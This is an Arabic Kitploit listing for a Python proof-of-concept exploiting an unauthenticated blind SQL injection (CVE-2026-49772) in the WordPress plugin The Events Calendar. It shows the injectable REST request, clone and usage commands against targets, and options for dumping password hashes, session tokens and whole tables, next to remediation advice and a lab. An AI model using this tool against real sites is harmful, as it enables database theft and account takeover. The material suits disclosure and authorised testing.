Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-49772 — استغلال حقن SQL أعمى لثغرة CVE-2026-49772 يستهدف إضافة The Events Calendar في ووردبريس. يستخرج محتويات قاعدة البيانات عبر استعلام منطقي/زمني مع فحص متعدد الخيوط، وتفريغ تجزئات المستخدمين، ودعم استعلامات مخصصة. | Kitploit
أدوات/GitHubGitHub/joshuavanderpoll/cve-2026-49772
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubjoshuavanderpoll/cve-2026-49772

CVE-2026-49772

استغلال حقن SQL أعمى لثغرة CVE-2026-49772 يستهدف إضافة The Events Calendar في ووردبريس. يستخرج محتويات قاعدة البيانات عبر استعلام منطقي/زمني مع فحص متعدد الخيوط، وتفريغ تجزئات المستخدمين، ودعم استعلامات مخصصة.

عرض المستودع
3منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

The Events Calendar ثغرة حقن SQL (CVE-2026-49772) PoC

Python

الوصف

CVE-2026-49772 هي حقن SQL أعمى بدون مصادقة في إضافة ووردبريس The Events Calendar. يسمح مُتحقق معامل REST معطوب (validate_callback يعيد إغلاقًا بدلاً من التحقق) بوصول معامل order في واجهة REST التجريبية tec/v1 إلى جملة SQL ORDER BY دون تنقية:

root@kitploit:~
GET /wp-json/tec/v1/events?orderby=event_date&order=<INJECTION>
root@kitploit:~
... ORDER BY event_date <INJECTION>, wp_posts.post_date DESC ...

هذه حقنة للقراءة فقط (لا استعلامات متراكبة، لا كتابة، لا مخرجات مباشرة) — لكن يمكن استخراج قاعدة البيانات بالكامل عبر أوراكل منطقي/زمني: هاشات كلمات مرور المستخدمين، رموز الجلسات، كلمات مرور التطبيقات، المفاتيح السرية.

النسخ المتأثرة: The Events Calendar 6.15.12 – 6.16.2 (أُصلحت في 6.16.3) الخطورة: CVSS 3.1 9.3 حرجة — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L

الميزات

  • --check — كشف غير إتلافي: نطاق REST، إصدار الإضافة، تأكيد قائم على الزمن
  • --recon — بصمة قاعدة البيانات: الإصدار، المستخدم الحالي، قاعدة البيانات، نظام التشغيل، الصلاحيات، بادئة الجداول
  • --users — تفريغ wp_users: أسماء الدخول، البريد الإلكتروني، هاشات كلمات المرور
  • --user-meta — تفريغ wp_usermeta: رموز الجلسات، كلمات مرور التطبيقات، الصلاحيات
  • --get-table — تفريغ أي جدول مع اكتشاف تلقائي للأعمدة
  • --query — استخراج نتيجة أي SELECT عددي (scalar)
  • أوراكلان (Two oracles) — منطقي سريع (افتراضي) أو زمني، متعدد الخيوط؛ دون اعتماديات خارجية

التثبيت

مكتبة Python 3 القياسية فقط — requirements.txt مضمّن لسير العمل المعتاد لكنه لا يثبّت أي شيء إضافي.

OSX / Linux

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
python3 CVE-2026-49772.py --help

Windows

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-49772.git
cd CVE-2026-49772
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python CVE-2026-49772.py --help

الاستخدام

root@kitploit:~
python3 CVE-2026-49772.py <target> <action> [options]

اختر إجراءً واحدًا فقط: --check، --recon، --users، --user-meta، --get-table <TABLE>، --query <SQL>. شغّل --help لمعرفة جميع الخيارات.


فحص الثغرة

root@kitploit:~
python3 CVE-2026-49772.py target.tld --check

استطلاع قاعدة البيانات

root@kitploit:~
python3 CVE-2026-49772.py target.tld --recon

تفريغ المستخدمين وهاشات كلمات المرور

root@kitploit:~
python3 CVE-2026-49772.py target.tld --users

استخراج قيمة مخصصة

root@kitploit:~
python3 CVE-2026-49772.py target.tld --query "SELECT @@version"

الضبط: --technique boolean|time، --delay، --threads، --rows، --prefix، --where، -useragent، -timeout. افحص العديد من المضيفين باستخدام -l targets.txt.

Docker PoC

مختبر Docker Compose مستقل بذاته يحوي الإضافة الهشّة (مضمّنة، ولا تُنزَّل عند الإقلاع) وأحداثًا مُعدّة مسبقًا. انظر docker/DOCKER.md.

root@kitploit:~
cd docker/
docker compose up -d
python3 ../CVE-2026-49772.py localhost:8080 --check

المعالجة

  • حدّث The Events Calendar إلى 6.16.3 أو أحدث
  • إلى أن يتم الترقيع، احجب /wp-json/tec/v1/ عند جدار الحماية / الخادم الوسيط (WAF / reverse proxy)

المراجع

  • The Events Calendar
  • CVE.org — CVE-2026-49772
  • NVD — CVE-2026-49772
  • نشرة GitHub الأمنية — GHSA-v796-wqfq-j4xh
  • Patchstack — حقن SQL في The Events Calendar

إخلاء المسؤولية

هذه الأداة مقدمة للأغراض التعليمية والبحثية فقط. استخدمها فقط ضد أنظمة تملكها أو لديك إذن كتابي صريح لاختبارها. لا يتحمل المنشئ أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.

تنزيل الأداة